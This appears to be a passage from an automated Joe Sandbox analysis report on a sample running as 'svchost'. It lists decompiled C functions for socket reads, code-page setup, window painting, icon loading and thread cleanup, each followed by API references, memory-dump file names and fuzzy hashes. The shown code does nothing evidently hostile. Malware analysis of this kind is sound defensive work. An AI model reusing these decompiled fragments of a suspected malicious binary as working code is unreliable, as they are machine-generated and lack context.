    • RtlInitializeCriticalSection.NTDLL(004C9E70), ref: 00414C12
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: CurrentThread$CreateCriticalEventH_prologInitializeSection
    • String ID: MA$^I
    • API String ID: 1775145326-2701824691
    • Opcode ID: cd1cd0cd265320a5edb096db0b4822c71cb40f976b767552976ca7bb101b2c1e
    • Instruction ID: 801251a0459e684a1d62c3a5ce3f24faf7e28c3b960e1234001016abeb21e4dd
    • Opcode Fuzzy Hash: cd1cd0cd265320a5edb096db0b4822c71cb40f976b767552976ca7bb101b2c1e
    • Instruction Fuzzy Hash: 2081D9B4500B048BCB25DF36C8907DAFBE8FFA4304F50496FD4AA47291DBB86648CB59
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 69%
    			E0042A2F0(intOrPtr* __ecx, char _a4, short _a8) {
    				char _v0;
    				signed int _v8;
    				intOrPtr _v12;
    				char _v16;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				signed int _v36;
    				char _v44;
    				intOrPtr _v48;
    				char _v64;
    				signed int _v68;
    				signed int _v76;
    				char _v84;
    				void* __edi;
    				signed int _t52;
    				void* _t54;
    				unsigned int _t59;
    				unsigned int _t64;
    				signed int _t76;
    				signed int _t77;
    				signed int _t89;
    				intOrPtr* _t98;
    				intOrPtr* _t106;
    				intOrPtr* _t111;
    				intOrPtr* _t117;
    				signed int _t119;
    				char _t121;
    				intOrPtr _t123;
    				intOrPtr _t124;
    
    				_push(0xffffffff);
    				_push(E0048F1C8);
    				_push( *[fs:0x0]);
    				 *[fs:0x0] = _t124;
    				_push(_t76);
    				_t111 = __ecx;
    				_t77 = _t76 | 0xffffffff;
    				if( *((intOrPtr*)(__ecx + 0x40)) != _t77) {
    					if(_a8 != 0x20) {
    						_t121 = _a4;
    						_push( &_a4);
    						_push(0x4004667f);
    						_push(_t121);
    						if( *0x4926bc() == 0) {
    							if(_v8 < 1) {
    								_v8 = 1;
    							}
    							E0040B5D0( &_v44);
    							_v16 = 1;
    							E0040B5D0( &_v64);
    							_t117 =  *0x4926c4;
    							_t52 = _v8;
    							_v16 = 2;
    							while(1) {
    								_t54 =  *_t117(_t121, E0040B6C0( &_v64), _t52, _t52, 0);
    								if(_t54 == _t77 || _t54 <= 0) {
    									break;
    								}
    								asm("sbb ecx, ecx");
    								_push(_t54);
    								E0040BD00( &_v64,  ~_v68 & _v76);
    								_t52 = 0x400;
    								_v36 = 0x400;
    							}
    							if(_v48 != 0) {
    								_t89 = 0;
    								_t59 =  *(_t111 + 0x58) >> 2;
    								if(_t59 > 0) {
    									_t106 =  *((intOrPtr*)(_t111 + 0x50));
    									while( *_t106 != _t121) {
    										_t89 = _t89 + 1;
    										_t106 = _t106 + 4;
    										if(_t89 < _t59) {
    											continue;
    										} else {
    										}
    										goto L24;
    									}
    									 *((intOrPtr*)( *_t111 + 0xc0))( &_v64,  *((intOrPtr*)( *((intOrPtr*)(_t111 + 0x60)) + _t89 * 4)));
    								}
    							}
    							L24:
    							_v36 = 1;
    							_v84 = 0x496c28;
    							E0040B7D0( &_v84);
    							_v36 = _t77;
    							_v64 = 0x496c28;
    							E0040B7D0( &_v64);
    						}
    					} else {
    						_t123 = _a4;
    						_t64 =  *(__ecx + 0x58) >> 2;
    						_t119 = 0;
    						if(_t64 <= 0) {
    							L9:
    							E00429F80(_t111, _t123);
    						} else {
    							_t98 =  *((intOrPtr*)(__ecx + 0x50));
    							while( *_t98 != _t123) {
    								_t119 = _t119 + 1;
    								_t98 = _t98 + 4;
    								if(_t119 < _t64) {
    									continue;
    								} else {
    									E00429F80(_t111, _t123);
    								}
    								goto L25;
    							}
    							_t79 = _t119 * 4;
    							E0040BE80(_t111 + 0x48, _t111);
    							E00483037( &_v0,  *((intOrPtr*)(_t111 + 0x60)) + _t79);
    							_v16 = 0;
    							E004825AC(_t111 + 0x5c, _t119, 1);
    							 *((intOrPtr*)( *_t111 + 0xc8))(_v12, _t119 * 4, 4);
    							_v28 = 0xffffffff;
    							E004832C2( &_v16);
    							goto L9;
    						}
    					}
    					L25:
    					 *[fs:0x0] = _v24;
    					return 0;
    				} else {
    					 *[fs:0x0] = _v12;
    					return 0;
    				}
    			}

    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID: 0-3916222277
    • Opcode ID: d2de074b3d45ce024631e1a5fb6468362857d0e7281a502ae09a33d0d596aeb6
    • Instruction ID: 55a9b4915954f33a131275ed66a1218e418ae8e2c13efbdafe410209530baeb2
    • Opcode Fuzzy Hash: d2de074b3d45ce024631e1a5fb6468362857d0e7281a502ae09a33d0d596aeb6
    • Instruction Fuzzy Hash: 6551BD712043519FC318EF15D891B6BB7A4FB94318F400A2EF94293280DB38EC55CB9B
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 92%
    			E00474269(void* __ebx, void* __edi) {
    				char _v17;
    				signed char _v18;
    				struct _cpinfo _v24;
    				char _v280;
    				char _v536;
    				char _v792;
    				char _v1304;
    				void* _t43;
    				char _t44;
    				signed char _t45;
    				void* _t55;
    				signed int _t56;
    				signed char _t64;
    				intOrPtr* _t66;
    				signed int _t68;
    				signed int _t70;
    				signed int _t71;
    				signed char _t76;
    				signed char _t77;
    				signed char* _t78;
    				void* _t81;
    				void* _t87;
    				void* _t88;
    
    				if(GetCPInfo( *0x4e1da4,  &_v24) == 1) {
    					_t44 = 0;
    					do {
    						 *((char*)(_t87 + _t44 - 0x114)) = _t44;
    						_t44 = _t44 + 1;
    					} while (_t44 < 0x100);
    					_t45 = _v18;
    					_v280 = 0x20;
    					if(_t45 == 0) {
    						L9:
    						E0047C0F8(1,  &_v280, 0x100,  &_v1304,  *0x4e1da4,  *0x4e1fc4, 0);
    						E004783D4( *0x4e1fc4, 0x100,  &_v280, 0x100,  &_v536, 0x100,  *0x4e1da4, 0);
    						E004783D4( *0x4e1fc4, 0x200,  &_v280, 0x100,  &_v792, 0x100,  *0x4e1da4, 0);
    						_t55 = 0;
    						_t66 =  &_v1304;
    						do {
    							_t76 =  *_t66;
    							if((_t76 & 0x00000001) == 0) {
    								if((_t76 & 0x00000002) == 0) {
    									 *(_t55 + 0x4e1dc0) =  *(_t55 + 0x4e1dc0) & 0x00000000;
    									goto L16;
    								}
    								 *(_t55 + 0x4e1ec1) =  *(_t55 + 0x4e1ec1) | 0x00000020;
    								_t77 =  *((intOrPtr*)(_t87 + _t55 - 0x314));
    								L12:
    								 *(_t55 + 0x4e1dc0) = _t77;
    								goto L16;
    							}
    							 *(_t55 + 0x4e1ec1) =  *(_t55 + 0x4e1ec1) | 0x00000010;
    							_t77 =  *((intOrPtr*)(_t87 + _t55 - 0x214));
    							goto L12;
    							L16:
    							_t55 = _t55 + 1;
    							_t66 = _t66 + 2;
    						} while (_t55 < 0x100);
    						return _t55;
    					}
    					_t78 =  &_v17;
    					do {
    						_t68 =  *_t78 & 0x000000ff;
    						_t56 = _t45 & 0x000000ff;
    						if(_t56 <= _t68) {
    							_t81 = _t87 + _t56 - 0x114;
    							_t70 = _t68 - _t56 + 1;
    							_t71 = _t70 >> 2;
    							memset(_t81 + _t71, memset(_t81, 0x20202020, _t71 << 2), (_t70 & 0x00000003) << 0);
    							_t88 = _t88 + 0x18;
    						}
    						_t78 =  &(_t78[2]);
    						_t45 =  *((intOrPtr*)(_t78 - 1));
    					} while (_t45 != 0);
    					goto L9;
    				}
    				_t43 = 0;
    				do {
    					if(_t43 < 0x41 || _t43 > 0x5a) {
    						if(_t43 < 0x61 || _t43 > 0x7a) {
    							 *(_t43 + 0x4e1dc0) =  *(_t43 + 0x4e1dc0) & 0x00000000;
    						} else {
    							 *(_t43 + 0x4e1ec1) =  *(_t43 + 0x4e1ec1) | 0x00000020;
    							_t64 = _t43 - 0x20;
    							goto L22;
    						}
    					} else {
    						 *(_t43 + 0x4e1ec1) =  *(_t43 + 0x4e1ec1) | 0x00000010;
    						_t64 = _t43 + 0x20;
    						L22:
    						 *(_t43 + 0x4e1dc0) = _t64;
    					}
    					_t43 = _t43 + 1;
    				} while (_t43 < 0x100);
    				return _t43;
    			}

    APIs
    • GetCPInfo.KERNEL32(?,00000000), ref: 0047427D
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Info
    • String ID: $
    • API String ID: 1807457897-3032137957
    • Opcode ID: 4af0ae1dbb743f000496c0ebf1c9b6ddeae5726f43500738d9f8be7b17881da0
    • Instruction ID: 485a8cbd048e1ba2025a6b054ecbb9a23ba9fe16882a88f09e268822e1e60195
    • Opcode Fuzzy Hash: 4af0ae1dbb743f000496c0ebf1c9b6ddeae5726f43500738d9f8be7b17881da0
    • Instruction Fuzzy Hash: EF4189301442D85EEB128724DD89FFB3FD8AB42704F1444E7E98DCA1A3C3794958CBAA
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 51%
    			E0042A090(intOrPtr* __ecx) {
    				intOrPtr _t34;
    				void* _t36;
    				intOrPtr _t64;
    				intOrPtr* _t67;
    				intOrPtr _t74;
    				void* _t75;
    
    				_push(0xffffffff);
    				_push(E0048F1A0);
    				_push( *[fs:0x0]);
    				 *[fs:0x0] = _t74;
    				_t75 = _t74 - 0x28;
    				_t71 = __ecx;
    				if( *((intOrPtr*)(__ecx + 0x40)) != 0xffffffff) {
    					if( *((short*)(_t75 + 0x40)) != 0x20) {
    						_t64 =  *((intOrPtr*)(_t75 + 0x40));
    						_push(_t75 + 0x44);
    						_push(0x4004667f);
    						_push(_t64);
    						if( *0x4926bc() == 0) {
    							if( *((intOrPtr*)(_t75 + 0x44)) < 1) {
    								 *((intOrPtr*)(_t75 + 0x44)) = 1;
    							}
    							E0040B5D0(_t75 + 0x20);
    							 *((intOrPtr*)(_t75 + 0x3c)) = 0;
    							E0040B5D0(_t75 + 0xc);
    							_t67 =  *0x4926c4;
    							_t34 =  *((intOrPtr*)(_t75 + 0x48));
    							 *((char*)(_t75 + 0x3c)) = 1;
    							while(1) {
    								_t36 =  *_t67(_t64, E0040B6C0(_t75 + 0x18), _t34, _t34, 0);
    								if(_t36 == 0xffffffff || _t36 <= 0) {
    									break;
    								}
    								asm("sbb ecx, ecx");
    								_push(_t36);
    								E0040BD00(_t75 + 0x28,  ~( *(_t75 + 0x1c)) &  *(_t75 + 0x14));
    								_t34 = 0x400;
    								 *((intOrPtr*)(_t75 + 0x48)) = 0x400;
    							}
    							if( *((intOrPtr*)(_t75 + 0x30)) != 0) {
    								 *((intOrPtr*)( *_t71 + 0xc0))(_t75 + 0x20);
    							}
    							 *((char*)(_t75 + 0x3c)) = 0;
    							 *((intOrPtr*)(_t75 + 0xc)) = 0x496c28;
    							E0040B7D0(_t75 + 0xc);
    							 *((intOrPtr*)(_t75 + 0x3c)) = 0xffffffff;
    							 *((intOrPtr*)(_t75 + 0x20)) = 0x496c28;
    							E0040B7D0(_t75 + 0x20);
    						}
    					} else {
    						 *((intOrPtr*)( *__ecx + 0xc4))();
    					}
    					 *[fs:0x0] =  *((intOrPtr*)(_t75 + 0x30));
    					return 0;
    				} else {
    					 *[fs:0x0] =  *((intOrPtr*)(_t75 + 0x28));
    					return 0;
    				}
    			}

    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID: 0-3916222277
    • Opcode ID: 3282144baf856ce8d5ed66fdba80f323df557589344fa089d17ac06c49687da6
    • Instruction ID: 426b3fdd22b07ce8414f359718db4965312d4c96e341c689398986923b2b8b30
    • Opcode Fuzzy Hash: 3282144baf856ce8d5ed66fdba80f323df557589344fa089d17ac06c49687da6
    • Instruction Fuzzy Hash: CC316A71208344AFD718DF24C850B6BB7F4FB94724F444A2EF896932D0DB78A9158B9B
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00414340(void* __ecx, struct HWND__* _a4, signed int _a8) {
    				intOrPtr _v4;
    				signed int _v8;
    				signed int _t15;
    				void* _t22;
    				void* _t24;
    				intOrPtr* _t28;
    				intOrPtr _t29;
    				void* _t30;
    				void* _t31;
    				struct HWND__* _t33;
    				struct HWND__* _t34;
    				signed int* _t35;
    
    				_t35 =  &_v8;
    				_t34 = _a4;
    				_t29 = __ecx + 0x14;
    				_v8 = 0;
    				_v4 = _t29;
    				do {
    					_t24 = 0;
    					while(1) {
    						_t28 = E004135B0(_t29, _t24, 0);
    						if(_t28 == 0) {
    							break;
    						}
    						_t27 = _t29;
    						if(E00413C90(_t29, _t24) != 0) {
    							L12:
    							_t24 = _t24 + 1;
    							continue;
    						} else {
    							_t5 = _t28 + 0x18; // 0x18
    							_t30 = _t5;
    							_t31 = _t30 + E0040C020(_t27, _t30);
    							_t15 = E0040C020(_t27, _t31);
    							_t35 =  &(_t35[2]);
    							_t33 =  *(_t31 + _t15);
    							if(_t33 != 0) {
    								_t33 =  *(_t33 + 0x1c);
    							}
    							if(_t33 == _t34) {
    								if(_t24 == 0) {
    									goto L16;
    								} else {
    									goto L18;
    								}
    							} else {
    								if(_t33 == 0) {
    									L11:
    									_t29 = _v4;
    									goto L12;
    								} else {
    									_t22 = E00418A40(0x3ea,  *_t28, 0);
    									if(_t22 == 0 || ( *(_t22 + 0x14) & 0x00200200) == 0 || IsChild(_t33, _t34) == 0) {
    										goto L11;
    									} else {
    										L18:
    										return _t24;
    									}
    								}
    							}
    						}
    						L19:
    					}
    					_t15 = _a8;
    					if(_t15 == 0) {
    						break;
    					} else {
    						_t15 = GetParent(_t34);
    						_t34 = _t15;
    						if(_t34 == 0) {
    							break;
    						} else {
    							goto L15;
    						}
    					}
    					goto L19;
    					L15:
    					_t15 = _v8 + 1;
    					_v8 = _t15;
    				} while (_t15 <= 1);
    				L16:
    				return _t15 | 0xffffffff;
    				goto L19;
    			}

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: ChildParent
    • String ID: ^I
    • API String ID: 1702929569-3473481074
    • Opcode ID: 3e08dbe5542ed707e6b28ba5f42d933fde0c0fed3bea102f5bf1efa6b1730ff0
    • Instruction ID: ea2d897dc0ac92a195663b1b330dc330137d0b93aa0a1fc9f3baaf09dc14762c
    • Opcode Fuzzy Hash: 3e08dbe5542ed707e6b28ba5f42d933fde0c0fed3bea102f5bf1efa6b1730ff0
    • Instruction Fuzzy Hash: 4921DA327003195BD6116E556C40BDBB398AFC0719F05062BFD60A7381EB58ED9986EA
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 85%
    			E00413010(void* __ebx, void* __ecx, void* __ebp) {
    				char _v8;
    				intOrPtr _v12;
    				intOrPtr _v16;
    				char _v24;
    				char _v36;
    				char _v52;
    				char _v96;
    				struct HDC__* _v100;
    				struct tagRECT _v120;
    				char _v124;
    				intOrPtr _v128;
    				char _v140;
    				char _v148;
    				char _v168;
    				void* _t31;
    				void* _t32;
    				void* _t37;
    				struct HBRUSH__* _t38;
    				intOrPtr _t45;
    				void* _t48;
    				void* _t66;
    				void* _t70;
    				void* _t73;
    				intOrPtr _t74;
    				void* _t82;
    
    				_t73 = __ebp;
    				_t48 = __ebx;
    				_push(0xffffffff);
    				_push(E0048E1C8);
    				_push( *[fs:0x0]);
    				 *[fs:0x0] = _t74;
    				_t70 = __ecx;
    				if( *((intOrPtr*)(__ecx + 0x484)) != 1) {
    					L7:
    					_t31 = E0042DC80(_t48, _t70, _t66, __eflags, _t82);
    					 *[fs:0x0] = _v12;
    					return _t31;
    				} else {
    					_t32 = E0042D860(__ecx);
    					_t79 = _t32;
    					if(_t32 != 0) {
    						goto L7;
    					} else {
    						_push(__ecx);
    						E00489D7E( &_v96, _t79);
    						_v8 = 0;
    						E0048992F( &_v100,  &(_v120.top));
    						if(IsRectEmpty( &_v120) == 0) {
    							_push( *((intOrPtr*)(_t70 + 0x40)));
    							_t38 = E00489F7B( &_v124);
    							_t81 = _t38;
    							if(_t38 != 0) {
    								_t38 =  *(_t38 + 4);
    							}
    							FillRect(_v100,  &_v120, _t38);
    							_v140 = 0x495e6c;
    							_t13 =  &_v140; // 0x495e6c
    							_v24 = 1;
    							E00489F15(_t13);
    							_v24 = 0;
    							E004896A6(E004895EE( &(_v120.top), 1),  &_v120, 0);
    							_t45 =  *((intOrPtr*)(E00483330( &_v148, _t73, 0x4accf8)));
    							_v36 = 2;
    							 *((intOrPtr*)(_v128 + 0x5c))(0xa, 0xa, _t45,  *((intOrPtr*)(_t45 - 8)));
    							_t24 =  &_v168; // 0x495e6c
    							_v52 = 0;
    							E004832C2(_t24);
    						}
    						_v8 = 0xffffffff;
    						_t37 = E00489DF0( &_v100, _t81);
    						 *[fs:0x0] = _v16;
    						return _t37;
    					}
    				}
    			}

    APIs
      • Part of subcall function 00489D7E: __EH_prolog.LIBCMT ref: 00489D83
      • Part of subcall function 00489D7E: BeginPaint.USER32(?,?,?,?,0040D2F9), ref: 00489DAC
      • Part of subcall function 0048992F: GetClipBox.GDI32(?,?), ref: 00489936
    • IsRectEmpty.USER32(?), ref: 0041306A
      • Part of subcall function 00489F7B: __EH_prolog.LIBCMT ref: 00489F80
      • Part of subcall function 00489F7B: CreateSolidBrush.GDI32(?), ref: 00489F9D
    • FillRect.USER32(?,?,00000000), ref: 00413097
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: H_prologRect$BeginBrushClipCreateEmptyFillPaintSolid
    • String ID: l^I
    • API String ID: 3827101677-2511626936
    • Opcode ID: 68bf0b0b5bf173ae0400dee28dac57896438c08ad355e14099842d38aed58aec
    • Instruction ID: d5906ff5afb0536b9bff8c11eed8a8cbc7486ae63db0c65ab173c6c0df60b278
    • Opcode Fuzzy Hash: 68bf0b0b5bf173ae0400dee28dac57896438c08ad355e14099842d38aed58aec
    • Instruction Fuzzy Hash: 3231AE31108B40AFD314EF21C885BAFB7E4BB98714F144D1EF5A683291DB78DA04CB96
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 94%
    			E0041AA80(intOrPtr __ecx) {
    				intOrPtr _v8;
    				intOrPtr _t25;
    				intOrPtr _t30;
    
    				_push(__ecx);
    				_v8 = __ecx;
    				if( *((intOrPtr*)(_v8 + 0x284)) != 1) {
    					L6:
    					_t25 = _v8;
    					__eflags =  *(_t25 + 0x28c);
    					if( *(_t25 + 0x28c) != 0) {
    						CloseHandle( *(_v8 + 0x28c));
    						 *(_v8 + 0x28c) = 0;
    					}
    					__eflags =  *(_v8 + 0x2a0);
    					__eflags = 0 |  *(_v8 + 0x2a0) == 0x00000000;
    					if(__eflags == 0) {
    						__eflags = _v8 + 0x2a4;
    						E004280B0(_v8 + 0x2a4);
    					}
    					return E00416120(_v8, __eflags);
    				}
    				 *((intOrPtr*)(_v8 + 0x284)) = 2;
    				while( *((intOrPtr*)(_v8 + 0x284)) != 0) {
    				}
    				_t30 = _v8;
    				__eflags =  *(_t30 + 0x28c);
    				if( *(_t30 + 0x28c) != 0) {
    					WaitForSingleObject( *(_v8 + 0x28c), 0xffffffff);
    				}
    				goto L6;
    			}

    APIs
    • WaitForSingleObject.KERNEL32(00000000,000000FF,^I,?,0041A8CF,^I,00418896,00000001,00000000,000000FF), ref: 0041AAC6
    • CloseHandle.KERNEL32(00000000,^I,?,0041A8CF,^I,00418896,00000001,00000000,000000FF), ref: 0041AAE2
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: CloseHandleObjectSingleWait
    • String ID: ^I
    • API String ID: 528846559-3473481074
    • Opcode ID: d22e4dd4c5fb07b0915310ee32d943376b8e73b0ba91f7d73db55a64df2d9507
    • Instruction ID: 2af4e16d044692d2dc8553b327cdf41f61ac966da2f9d0a49496e5f6562ad222
    • Opcode Fuzzy Hash: d22e4dd4c5fb07b0915310ee32d943376b8e73b0ba91f7d73db55a64df2d9507
    • Instruction Fuzzy Hash: 4011D638A02105EBDB14DB54D69CBEE73B2AF84304F6881B9E4051B391CB795E41EB55
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0048A693(void* __ecx) {
    				intOrPtr _t23;
    				intOrPtr* _t27;
    				void* _t29;
    				intOrPtr* _t30;
    				void* _t32;
    
    				E00473304(E00490F9C, _t32);
    				_t30 = E00483003(0x10);
    				_t27 = _t29;
    				 *((intOrPtr*)(_t32 - 0x14)) = _t30;
    				 *(_t32 - 4) =  *(_t32 - 4) & 0x00000000;
    				if(_t30 == 0) {
    					_t30 = 0;
    				} else {
    					E004837D7(_t30);
    					_t23 =  *0x4b8924; // 0x4b8938
    					_t4 = _t30 + 0xc; // 0xc
    					_t27 = _t4;
    					 *_t27 = _t23;
    					_t5 = _t32 + 8; // 0x0
    					_t6 = _t32 + 0xc; // 0xc1241034
    					 *(_t32 - 4) = 2;
    					 *_t30 = 0x49d010;
    					 *((intOrPtr*)(_t30 + 8)) =  *_t5;
    					E004833FF(_t27,  *_t6);
    				}
    				 *(_t32 - 4) =  *(_t32 - 4) | 0xffffffff;
    				_t11 = _t32 - 0x10; // 0x494608
    				 *((intOrPtr*)(_t32 - 0x10)) = _t30;
    				E00472E92(_t11, 0x4a5570);
    				return SendMessageA( *( *((intOrPtr*)(_t27 + 0x1c)) + 0x1c), 0x10, 0, 0);
    			}

    APIs
    • __EH_prolog.LIBCMT ref: 0048A698
    • SendMessageA.USER32(?,00000010,00000000,00000000), ref: 0048A704
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: H_prologMessageSend
    • String ID: Status
    • API String ID: 2337391251-2091671594
    • Opcode ID: 3796ba2c147473299d3d85fd2a2b39f93812a123aaaa5fa830fc60d08fa8ca87
    • Instruction ID: afcea4d7c001ec068e5533b0c1078ec65b9e5925f433798d8fa723041570b9eb
    • Opcode Fuzzy Hash: 3796ba2c147473299d3d85fd2a2b39f93812a123aaaa5fa830fc60d08fa8ca87
    • Instruction Fuzzy Hash: 6A018470901214AFDF20EF64C905B9EBBA0EF04718F20895FF954AB191E7F89B01DB89
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00420380(struct HINSTANCE__* _a4, CHAR* _a8, intOrPtr* _a12, char _a16) {
    				void* _t6;
    				struct HINSTANCE__* _t10;
    				CHAR* _t11;
    
    				_t11 = _a8;
    				_t10 = _a4;
    				 *_a12 = LoadImageA(_t10, _t11, 1, 0x20, 0x20, 0);
    				_t6 = LoadImageA(_t10, _t11, 1, 0x10, 0x10, 0);
    				_t4 =  &_a16; // 0x41522b
    				 *( *_t4) = _t6;
    				return _t6;
    			}

    APIs
    • LoadImageA.USER32(?,?,00000001,00000020,00000020,00000000), ref: 0042039B
    • LoadImageA.USER32(?,?,00000001,00000010,00000010,00000000), ref: 004203AD
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: ImageLoad
    • String ID: +RA
    • API String ID: 306446377-1108295363
    • Opcode ID: 6c9b51cbf4e8a77a6cf66faf12c38e8da9a7ee9024dcb9684fa3d373200c04e9
    • Instruction ID: b0eb1517b24abdeb61cc5f6169811e4bf34e3c41e60c97d7a53f11b58278252a
    • Opcode Fuzzy Hash: 6c9b51cbf4e8a77a6cf66faf12c38e8da9a7ee9024dcb9684fa3d373200c04e9
    • Instruction Fuzzy Hash: DDE0ED3234131177D620CE5A8C85F9BF7E9EB8DB10F100819B344AB1D1C2F1B44586A9
    Uniqueness

    Uniqueness Score: -1.00%